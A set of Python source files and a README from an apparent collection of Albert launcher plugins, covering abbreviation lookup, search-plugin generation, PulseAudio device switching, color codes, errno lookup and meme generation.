# plugin main functions -----------------------------------------------------------------------
if abbr_store_fname.is_file():
with open(abbr_store_fname, "r") as f:
p = Path(f.readline().strip()).expanduser()
if not p.is_file():
raise FileNotFoundError(p)
abbreviations_path = p
if abbr_store_sep.is_file():
with open(abbr_store_sep, "r") as f:
sep = f.read(1)
if not sep:
raise RuntimeError(f"Invalid separator: {sep}")
split_at = sep
def save_abbr(name: str, desc: str):
with open(abbreviations_path, "a") as f:
li = f"\n* {name}: {desc}"
f.write(li)
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def get_abbr_as_item(abbr: Tuple[str, str]):
"""Return the abbreviation pair as an item - ready to be appended to the items list and be rendered by Albert."""
text = abbr[0].strip()
subtext = abbr[1].strip()
return v0.Item(
id=md_name,
icon=[icon_path],
text=f"{text}",
subtext=f"{subtext}",
actions=[
UrlAction("Open in Google", f"https://www.google.com/search?&q={text}"),
ClipAction("Copy abbreviation", text),
ClipAction("Copy description", subtext),
],
)
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def submit_fname(p: Path):
p = p.expanduser().resolve()
if p.is_file():
with open(abbr_store_fname, "w") as f:
f.write(str(p))
global abbreviations_path
abbreviations_path = p
else:
notify(f"Given file path does not exist -> {p}")
def submit_sep(c: str):
if len(c) > 1:
notify("Separator must be a single character!")
return
with open(abbr_store_sep, "w") as f:
f.write(c)
global split_at
split_at = c
def setup(query) -> bool:
"""Setup is successful if an empty list is returned.
Use this function if you need the user to provide you data
"""
query_str = query.string
# abbreviations file
if not abbr_store_fname.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Specify file to read/write abbreviations to/from",
subtext="Paste the path to the file, then press ENTER",
actions=[
FuncAction("Submit path", lambda p=query_str: submit_fname(Path(p))),
],
)
)
return True
if not abbr_store_sep.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Specify separator *character* for abbreviations",
subtext=f"Separator: {query_str}",
actions=[
FuncAction("Submit separator", lambda c=query_str: submit_sep(c)),
],
)
)
return True
return False
def make_latest_dict(conts: list):
d = {}
for li in conts:
tokens = li.split(split_at, maxsplit=1)
if len(tokens) == 2:
# avoid cases where one of the two sides is essentially empty
if any([not t for t in tokens]):
continue
tokens = [t.strip().strip("*") for t in tokens]
d[tokens[0]] = tokens[1]
return d
def hash_file(p: Path) -> str:
h = hashlib.sha256()
with open(p) as f:
h.update(f.read().encode("utf-8"))
return h.hexdigest()
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "ab "
def synopsis(self):
return "abbreviation to look for"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query):
"""Hook that is called by albert with *every new keypress*.""" # noqa
try:
results_setup = setup(query)
if results_setup:
return
query_str = query.string
if len(query_str.strip().split()) == 0:
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="[new] Add a new abbreviation",
subtext="new <u>abbreviation</u> <u>description</u>",
completion=f"{query.trigger} new ",
)
)
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Write more to query the database",
subtext="",
completion=query.trigger,
)
)
return
# new behavior
tokens = query_str.split()
if len(tokens) >= 1 and tokens[0] == "new":
if len(tokens) > 1:
name = tokens[1]
else:
name = ""
if len(tokens) > 2:
desc = " ".join(tokens[2:])
else:
desc = ""
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text=f"New abbreviation: {name}",
subtext=f"Description: {desc}",
actions=[
FuncAction(
"Save abbreviation to file",
lambda name=name, desc=desc: save_abbr(name, desc),
)
],
)
)
return
curr_hash = hash_file(abbreviations_path)
global abbr_latest_hash, abbr_latest_d, abbr_latest_d_bi
if abbr_latest_hash != curr_hash:
abbr_latest_hash = curr_hash
with open(abbreviations_path) as f:
conts = f.readlines()
abbr_latest_d = make_latest_dict(conts)
abbr_latest_d_bi = abbr_latest_d.copy()
abbr_latest_d_bi.update({v: k for k, v in abbr_latest_d.items()})
if not abbr_latest_d:
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text=f'No lines split by "{split_at}" in the file provided',
actions=[
ClipAction(
"Copy provided filename",
str(abbreviations_path),
)
],
)
)
return
# do fuzzy search on both the abbreviations and their description
matched = process.extract(query_str, abbr_latest_d_bi.keys(), limit=10)
for m in [elem[0] for elem in matched]:
if m in abbr_latest_d.keys():
query.add(get_abbr_as_item((m, abbr_latest_d[m])))
else:
query.add(get_abbr_as_item((abbr_latest_d_bi[m], m)))
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep># timezones - Albert plugin
## Prerequisites
Make sure you have the following python packages installed:
- `Pillow`
- `pytz`
- `requests`
- `tzlocal`
- `thefuzz`
- `pycountry`
## Description
Lookup time zones based on either the city or the country name. The plugin will
autocomplete all the appropriate city and country names based on fuzzy search
and will always show your current country/city on top so that you can easily
compare
On top it will always show you your local timezone so that you can compare.
Thanks to <https://flagpedia.net/> for the country logos
## Demo


## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>#!/usr/bin/env python3
"""
Create an albert python plugin for each one of the specified websites.
Uses the `ddgr` tool for the actual search.
"""
import os
import re
import secrets
import shutil
from pathlib import Path, PurePosixPath
from typing import Optional
import requests
from cookiecutter.main import cookiecutter
# globals -------------------------------------------------------------------------------------
# Get all the websites that work with ddgr or manually specify websites to create a plugin
# for.
generate_plugins_only_for = [
"alternativeto",
"amazon",
"askubu",
"aur.archlinux",
"bbc",
"cambridge",
"cnn",
"cracked",
"crunchbase",
"distrowatch",
"dpkg",
"ebay",
"facebook",
"github",
"gnu",
"hackaday",
"howstuffworks",
"imdb",
"kernel",
"last",
"linkedin",
"linux",
"man7",
"mdn",
"opensubtitles",
"quora",
"reddit",
"rottentomatoes",
"rpmfind",
"sourceforge",
"stackoverflow",
"ted",
"torrentz2",
"twitter",
"vim",
"wikipedia",
"wikiquote",
"yahoo",
]
custom_plugins = {
"search_acronyms": {"ddgr_at": "https://www.allacronyms.com", "trigger": "acro"},
"search_amazon": {
"trigger": "ama",
"ddgr_at": "amazon.co.uk",
"show_on_top_no_trigger": True,
},
"search_cmake": {
"trigger": "cmake",
"ddgr_at": "cmake.org",
},
"search_ros2": {
"trigger": "ros2",
"ddgr_at": "docs.ros2.org/",
"show_on_top_no_trigger": False,
},
"search_cambridge_dictionary": {
"ddgr_at": "dictionary.cambridge.org",
"trigger": "cam",
},
"search_cppreference": {"trigger": "cpp", "ddgr_at": "en.cppreference.com"},
"search_devhints": {"ddgr_at": "devhints.io", "trigger": "dev"},
"search_dlib": {"ddgr_at": "dlib.net", "trigger": "dlib"},
"search_ddgr": {"trigger": "dd", "ddgr_at": "", "show_on_top_no_trigger": True},
"search_kivy": {"trigger": "kv", "ddgr_at": "kivy.org"},
"search_mdn": {
"ddgr_at": "https://developer.mozilla.org/en-US/docs/Web",
"trigger": "mdn",
},
"search_numpy": {"ddgr_at": "numpy.org/doc", "trigger": "np"},
"search_opencv": {"ddgr_at": "docs.opencv.org", "trigger": "cv2"},
"search_patreon": {"trigger": "patreon", "ddgr_at": "patreon.com"},
"search_pydocs": {"ddgr_at": "docs.python.org", "trigger": "pydocs"},
"search_pypi": {"ddgr_at": "pypi.org", "trigger": "pypi"},
"search_qt5_docs": {"ddgr_at": "doc.qt.io/qt-5", "trigger": "qt5"},
"search_rust": {"ddgr_at": "https://doc.rust-lang.org", "trigger": "ru"},
"search_rustcreates": {"ddgr_at": "https://docs.rs", "trigger": "rc"},
"search_scihub": {"ddgr_at": "sci-hub.tw", "trigger": "sci"},
"search_scipy": {"ddgr_at": "docs.scipy.org", "trigger": "sp"},
"search_ubuntu": {"ddgr_at": "https://packages.ubuntu.com", "trigger": "ubu"},
"search_urbandictionary": {"ddgr_at": "urbandictionary.com", "trigger": "ud"},
"search_ikea": {"ddgr_at": "ikea.com", "trigger": "ik"},
"search_wikipedia": {
"ddgr_at": "en.wikipedia.org",
"trigger": "w",
"show_on_top_no_trigger": True,
},
"search_wikiquote": {"ddgr_at": "en.wikiquote.org", "trigger": "quote"},
"search_youtube": {
"trigger": "yt",
"ddgr_at": "youtube.com",
"url_handler": "mpv",
"url_handler_check_cmd": "which mpv && which youtube-dl",
"url_handler_description": "Launch using mpv",
"show_on_top_no_trigger": True,
},
"search_cssreference_io": {
"ddgr_at": "cssreference.io",
"trigger": "css",
},
"search_octopart": {
"ddgr_at": "octopart.com",
"trigger": "octo",
},
}
# generate_plugins_only_for = []
# supplementary methods -----------------------------------------------------------------------
def get_plugin_name_wo_search(plugin_name):
return plugin_name[len("search_") :]
def parse_ddgr_at_line(line: str):
"""Parse lines of this form:
alias @zdnet='ddgr -w zdnet.com'\n
"""
tokens = line.strip().split()
ddgr_at = tokens[-1][:-1] # ignore "'" in the end of line
plugin_name = ddgr_at.split(".")[0]
res = re.search("@(.*)=", line)
if res is None:
trigger = None
else:
trigger = res.groups()[0]
return plugin_name, ddgr_at, trigger
def ddgr_plugins() -> dict:
res = requests.get(
"https://raw.githubusercontent.com/jarun/googler/master/auto-completion/googler_at/googler_at"
)
alias_lines = [
l for l in res.text.splitlines() if "alias" in l and not l.lstrip().startswith("#")
]
ddgr_plugins = {}
for l in alias_lines:
plugin_name, ddgr_at, trigger = parse_ddgr_at_line(l)
if trigger is None:
continue
plugin_name = "_".join(["search", plugin_name])
ddgr_plugins[plugin_name] = {"ddgr_at": ddgr_at, "trigger": trigger}
# user-specified filter
if generate_plugins_only_for:
ddgr_plugins = {
g[0]: g[1]
for g in ddgr_plugins.items()
if get_plugin_name_wo_search(g[0]) in generate_plugins_only_for
}
return ddgr_plugins
def get_cookiecutter_directives(
plugin_name,
trigger,
ddgr_at,
url_handler,
url_handler_description,
url_handler_check_cmd,
show_on_top_no_trigger,
):
github_user = "bergercookie"
cookiecutter_directives = {
"author": "<NAME>",
"plugin_name": plugin_name,
"trigger": trigger,
"ddgr_at": ddgr_at,
"url_handler": url_handler,
"url_handler_description": url_handler_description,
"url_handler_check_cmd": url_handler_check_cmd,
"github_user": github_user,
"repo_base_url": f"https://github.com/{github_user}/awesome-albert-plugins/blob/master/plugins/",
"download_url_base": f"https://raw.githubusercontent.com/{github_user}/awesome-albert-plugins/master/plugins/{plugin_name}/",
"plugin_short_description": f'{plugin_name.split("_")[1].capitalize()}: Search suggestions for {plugin_name.split("_")[1].capitalize()}',
"show_on_top_no_trigger": show_on_top_no_trigger,
"albert_plugin_interface": "v0.2",
"version": "0.1.0",
}
return cookiecutter_directives
# main ----------------------------------------------------------------------------------------
def main(): # noqa
# setup -----------------------------------------------------------------------------------
cookiecutter_orig_path = Path(__file__).parent / "plugins" / "search_template"
assert cookiecutter_orig_path.is_dir(), f"No such directory -> {cookiecutter_orig_path}"
def get_logo(plugin_name) -> Optional[Path]:
"""Get the corresponding logo or None if the latter is not found."""
path_to_logos = Path(__file__).parent / "ddgr_logos"
all_logos = [str(p) for p in path_to_logos.iterdir()]
r = re.compile(
f"{str(path_to_logos / get_plugin_name_wo_search(plugin_name))}\.[png\|jpg\|svg]"
)
matching_logos = list(filter(r.search, all_logos))
if len(matching_logos):
logo_path = Path(matching_logos[0])
else:
logo_path = Path(__file__).parent / "ddgr_logos" / "default.svg"
return logo_path
def get_output_dir(plugin_name) -> Path:
"""Get the output directory for the plugin at hand."""
return Path(__file__).parent / "plugins" / plugin_name
oldpwd = Path(".").absolute()
os.chdir(Path(__file__).parent)
# main functionality ----------------------------------------------------------------------
plugins = ddgr_plugins()
plugins.update(custom_plugins)
for plugin in plugins.items():
plugin_name = plugin[0]
trigger = plugin[1]["trigger"]
ddgr_at = plugin[1]["ddgr_at"]
url_handler = plugin[1].get("url_handler", "")
url_handler_description = plugin[1].get("url_handler_description", "")
url_handler_check_cmd = plugin[1].get("url_handler_check_cmd", "")
show_on_top_no_trigger = plugin[1].get("show_on_top_no_trigger", False)
print()
print("===============================================")
print(f"Generating plugin -> {plugin_name}")
print("===============================================")
print()
# create temporary template directory
random_int = secrets.randbits(32)
cookiecutter_tmp = PurePosixPath("/tmp") / f"albert-cookiecutter-{random_int}"
shutil.copytree(cookiecutter_orig_path, cookiecutter_tmp)
print(f"- Cookiecutter template directory -> {cookiecutter_tmp}")
print(f"- Plugin output directory-> {get_output_dir(plugin_name)}")
cookiecutter(
template=str(cookiecutter_tmp),
no_input=True,
overwrite_if_exists=True,
extra_context=get_cookiecutter_directives(
plugin_name=plugin_name,
trigger=trigger,
ddgr_at=ddgr_at,
url_handler=url_handler,
url_handler_description=url_handler_description,
url_handler_check_cmd=url_handler_check_cmd,
show_on_top_no_trigger=show_on_top_no_trigger,
),
output_dir=get_output_dir(plugin_name).parent,
)
# copy logo if exists
ext = get_logo(plugin_name).suffix
shutil.copy(get_logo(plugin_name), get_output_dir(plugin_name) / f"{plugin_name}{ext}")
# postprocessing --------------------------------------------------------------------------
os.chdir(oldpwd)
# TODO Remove temporary cookiecutter file and directories?
if __name__ == "__main__":
main()
<file_sep>"""PulseAudio - Set I/O Audio devices and Profile."""
import traceback
from pathlib import Path
from threading import Lock
from typing import Dict, List, Union
from fuzzywuzzy import process
from pulsectl import Pulse, pulsectl
from albert import *
md_iid = "0.5"
md_version = "0.2"
md_name = "PulseAudio - Set I/O Audio devices and profile"
md_description = "Switch between PulseAudio sources and sinks"
md_license = "BSD-2"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//pulse_control"
)
md_maintainers = "<NAME>"
md_lib_dependencies = ["pulsectl"]
pulse_lock = Lock()
src_icon_path = str(Path(__file__).parent / "source")
sink_icon_path = str(Path(__file__).parent / "sink")
config_icon_path = str(Path(__file__).parent / "configuration")
cache_path = Path(cacheLocation()) / "pulse_control"
config_path = Path(configLocation()) / "pulse_control"
data_path = Path(dataLocation()) / "pulse_control"
pulse = Pulse("albert-client")
class ClipAction(Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: setClipboardText(copy_text))
class FuncAction(Action):
def __init__(self, name, command):
super().__init__(name, name, command)
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "p "
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> list:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string.strip()
# avoid racing conditions when multiple queries are running simultaneously (i.e,
# current and previous query due to successive keystrokes)
pulse_lock.acquire()
sources_sinks: List[Union[pulsectl.PulseSourceInfo, pulsectl.PulseSinkInfo]] = [
*pulse.sink_list(),
*pulse.source_list(),
]
cards: List[pulsectl.PulseCardInfo] = pulse.card_list()
pulse_lock.release()
if not query_str:
results.extend(self.render_noargs(query, sources_sinks, cards))
else:
results.extend(self.render_search(sources_sinks, cards, query))
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
Item(
id=self.name(),
icon=[],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
def render_noargs(
self,
query,
sources_sinks: List[Union[pulsectl.PulseSourceInfo, pulsectl.PulseSinkInfo]],
cards: List[pulsectl.PulseCardInfo],
) -> List[Item]:
"""Display current source, sink and card profiles."""
results = []
# active port for sources, sinks ----------------------------------------------------------
for s in sources_sinks:
# discard if it doesn't have any ports
if s.port_active is None:
continue
icon = sink_icon_path if is_sink(s) else src_icon_path
# fill actions
actions = [
FuncAction(p.description, lambda s=s, p=p: pulse.port_set(s, p))
for p in s.port_list
]
results.append(
Item(
id=self.name(),
icon=[icon],
text=s.port_active.description,
subtext=s.description,
completion=query.trigger,
actions=actions,
)
)
# active profile for each sound card ------------------------------------------------------
for c in cards:
actions = [
FuncAction(
prof.description, lambda c=c, prof=prof: pulse.card_profile_set(c, prof)
)
for prof in c.profile_list
]
results.append(
Item(
id=self.name(),
icon=[config_icon_path],
text=c.profile_active.description,
subtext=c.name,
completion=query.trigger,
actions=actions,
)
)
return results
def render_search(
self,
sources_sinks: List[Union[pulsectl.PulseSourceInfo, pulsectl.PulseSinkInfo]],
cards: List[pulsectl.PulseCardInfo],
query,
) -> List[Item]:
results = []
# sinks, sources
search_str_to_props: Dict[str, list] = {
p.description: [
sink_icon_path if is_sink(s) else src_icon_path,
s.description,
lambda s=s, p=p: pulse.port_set(s, p),
]
for s in sources_sinks
for p in s.port_list
}
# profiles
search_str_to_props.update(
{
prof.description: [
config_icon_path,
f"Profile | {c.name}",
lambda c=c, prof=prof: pulse.card_profile_set(c, prof),
]
for c in cards
for prof in c.profile_list
}
)
# add albert items
matched = process.extract(query.string, list(search_str_to_props.keys()), limit=10)
for m in [elem[0] for elem in matched]:
icon = search_str_to_props[m][0]
subtext = search_str_to_props[m][1]
action = FuncAction(m, search_str_to_props[m][2])
results.append(
Item(
id=self.name(),
icon=[icon],
text=m,
subtext=subtext,
completion=" ".join([query.trigger, query.string]),
actions=[action],
)
)
return results
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
def is_sink(s):
return isinstance(s, pulsectl.PulseSinkInfo)
<file_sep>"""Visualise color codes."""
# TODO on color selection show
# RGB
# YCMK
# HSL
# Similar colors
import traceback
from pathlib import Path
from typing import Optional
import matplotlib.pyplot as plt
import numpy as np
import colour
from colour import Color
from fuzzywuzzy import process
import albert as v0
md_name = "Color codes visualisation"
md_description = "Color codes visualisation"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/colors"
icon_path = str(Path(__file__).parent / "colors")
cache_path = Path(v0.cacheLocation()) / "colors"
config_path = Path(v0.configLocation()) / "colors"
data_path = Path(v0.dataLocation()) / "colors"
color_names = colour.COLOR_NAME_TO_RGB.keys()
h_values = [Color(c).get_hex() for c in color_names]
color_names_and_hex = list(color_names) + h_values
h_to_color_name = {h: c for h, c in zip(h_values, color_names)}
# supplementary functions ---------------------------------------------------------------------
def get_color_thumbnail(color: Color) -> Path:
"""
Retrieve the thumbnail of the given color. The output name will be the corresponding hex
strings. If the corresponding file does not exist, it will create it.
"""
fname = data_path / (str(color.get_hex_l()[1:]) + ".png")
if fname.exists():
if fname.is_file():
return fname
else:
raise FileNotFoundError(f"Thumbnail file exists but it's not a file -> {fname}")
# file not there - cache it
thumbnail_size = (50, 50)
rgb_triad = np.array([c * 255 for c in color.get_rgb()], dtype=np.uint8)
mat = np.zeros((*thumbnail_size, 3), dtype=np.uint8) + rgb_triad
plt.imsave(fname, mat)
return fname
def get_as_item(color):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
img_path = str(get_color_thumbnail(color))
rgb = [int(i * 255) for i in color.get_rgb()]
hl = color.get_hex_l()
if hl in h_to_color_name:
name = f" | {h_to_color_name[hl]}"
else:
name = ""
actions = [
ClipAction("Copy Hex (Long)", hl),
ClipAction("Copy RGB", f"{rgb}"),
ClipAction("Copy RGB [0, 1]", f"{color.get_rgb()}"),
]
h = color.get_hex()
if h != hl:
actions.insert(0, ClipAction("Copy Hex (Short)", h))
return v0.Item(
id=f"{md_name}_{hl}",
icon=[img_path],
text=f"{hl}{name}",
subtext=f"{rgb}",
actions=actions,
)
def get_as_color(s: str) -> Optional[Color]:
try:
c = Color(s)
return c
except:
return None
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "col "
def synopsis(self):
return "some color description ..."
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
try:
query_str = query.string.strip()
if not query_str:
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Give me color name, rgb triad or hex value",
subtext="supports fuzzy-search...",
)
)
return
# see if the name matches a color exactly
color = get_as_color(query_str)
if color:
query.add(get_as_item(color))
return
# no exact match
matched = process.extract(query_str, list(color_names_and_hex), limit=10)
query.add([get_as_item(Color(elem[0])) for elem in matched])
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>"""Errno operations."""
import subprocess
import traceback
from pathlib import Path
from typing import Dict, Tuple
import albert as v0
md_name = "Errno lookup operations"
md_description = "Lookup error codes alongside their full name and description"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//errno_lookup"
)
md_bin_dependencies = ["errno"]
icon_path = str(Path(__file__).parent / "errno_lookup")
cache_path = Path(v0.cacheLocation()) / "errno_lookup"
config_path = Path(v0.configLocation()) / "errno_lookup"
data_path = Path(v0.dataLocation()) / "errno_lookup"
lines = [
li.split(maxsplit=2)
for li in subprocess.check_output(["errno", "--list"]).decode("utf-8").splitlines()
]
codes_d: Dict[str, Tuple[str, str]] = {li[1]: (li[0], li[2]) for li in lines}
# supplementary functions ---------------------------------------------------------------------
def get_as_item(t: Tuple[str, Tuple[str, str]]):
return v0.Item(
id=md_name,
icon=[icon_path],
text=f"{t[0]} - {t[1][0]}",
subtext=f"{t[1][1]}",
completion="",
actions=[],
)
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "err "
def synopsis(self):
return "error number or description ..."
def initialize(self):
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
try:
query_str: str = query.string
for item in codes_d.items():
if query_str in item[0]:
query.add(get_as_item(item))
else:
for v in item[1]:
if query_str.lower() in v.lower():
query.add(get_as_item(item))
break
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>"""Meme Generator - Generate memes with custom quotes - ready to be copied / uploaded / shared at an instant."""
from pathlib import Path
from typing import List
import shutil
import subprocess
import traceback
from fuzzywuzzy import process
from gi.repository import GdkPixbuf, Notify
import albert as v0
md_name = "Meme"
md_description = (
"Meme Generator - Generate memes with custom quotes - ready to be copied / uploaded /"
" shared at an instant"
)
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/meme-generator"
)
md_bin_dependencies = ["meme", "xclip"]
md_lib_dependencies = ["shutil", "fuzzywuzzy"]
icon_path = str(Path(__file__).parent / "meme-generator")
cache_path = Path(v0.cacheLocation()) / "meme-generator"
config_path = Path(v0.configLocation()) / "meme-generator"
data_path = Path(v0.dataLocation()) / "meme-generator"
# plugin main functions -----------------------------------------------------------------------
def initialize():
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize():
pass
def import_template_ids() -> List[str]:
"""Return a list of all the supported template IDs."""
if not shutil.which("meme"):
raise RuntimeError(
'Cannot find the "meme" go package - "'
"Are you sure you installed https://github.com/nomad-software/meme?"
)
return subprocess.check_output(["meme", "-list-templates"]).decode("utf-8").splitlines()
def get_template_img(meme_id: str) -> Path:
"""Get the path to the template image, given the template meme ID."""
# may be a bit fragile - TODO Find a better way to do it.
bin_path = Path(shutil.which("meme")).parent # type: ignore
meme_reg_path = bin_path.parent / "pkg" / "mod" / "github.com" / "nomad-software"
meme_reg_versions = list(meme_reg_path.glob("meme@*"))
if not meme_reg_versions:
raise RuntimeError(f'Can\'t find any Go "meme" packages under {meme_reg_path}')
# use the most recent versions
return meme_reg_versions[0] / "data" / "images" / f"{meme_id}.jpg"
class Template:
def __init__(self, id: str):
self.id = id
self.img = get_template_img(id)
def title(self) -> str:
return self.id.replace("-", " ").capitalize()
@property
def albert_id(self):
return f"{md_name}_{self.id}"
def get_as_item(self, query):
"""Return it as item - ready to be appended to the items list and be rendered by
Albert.
"""
return v0.Item(
id=self.albert_id,
icon=[str(self.img)],
text=self.title(),
subtext="",
completion=f"{query.trigger} {self.id} ",
actions=[
FuncAction("Copy vanilla image", lambda: self.copy_vanilla_img()),
ClipAction("Copy vanilla image path", str(self.img)),
],
)
def _create_custom_meme(self, caption1: str, caption2: str) -> Path:
output = "/tmp/albert-meme.png"
subprocess.check_call(
["meme", "-i", self.id, "-o", output, "-t", f"{caption1}|{caption2}"]
)
return Path(output)
def _create_n_copy_to_clipboard(self, caption1: str, caption2: str):
p = self._create_custom_meme(caption1=caption1, caption2=caption2)
subprocess.check_call(["xclip", "-selection", "clipboard", "-t", "image/png", str(p)])
def _create_n_copy_path_to_clipboard(self, caption1: str, caption2: str):
p = self._create_custom_meme(caption1=caption1, caption2=caption2)
subprocess.Popen(f"echo {p}| xclip -selection clipboard", shell=True)
def get_as_item_custom(self, query, caption1=None, caption2=None):
if caption1 or caption2:
subtext = f"UP: {caption1} | DOWN: {caption2}"
else:
subtext = f"USAGE: {self.id} [upper-text] | [lower-text]"
return v0.Item(
id=md_name,
icon=[str(self.img)],
text=self.title(),
subtext=subtext,
completion=f"{query.trigger} {self.id} ",
actions=[
FuncAction(
"Copy generated custom meme to clipboard",
lambda caption1=caption1, caption2=caption2: self._create_n_copy_to_clipboard(
caption1=caption1, caption2=caption2
),
),
FuncAction(
"Copy generated custom meme path",
lambda caption1=caption1, caption2=caption2: str(
self._create_n_copy_path_to_clipboard(
caption1=caption1, caption2=caption2
)
),
),
FuncAction(
"Copy generated custom meme to clipboard",
lambda caption1=caption1, caption2=caption2: self._create_n_copy_to_clipboard(
caption1=caption1, caption2=caption2
),
),
],
)
def copy_vanilla_img(self):
fname_out = "/tmp/meme.png"
subprocess.check_call(["convert", "-format", "png", str(self.img), fname_out])
subprocess.check_call(
["xclip", "-selection", "clipboard", "-t", "image/png", fname_out]
)
all_templates = [Template(id=id) for id in import_template_ids()]
id_to_template = {template.id: template for template in all_templates}
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
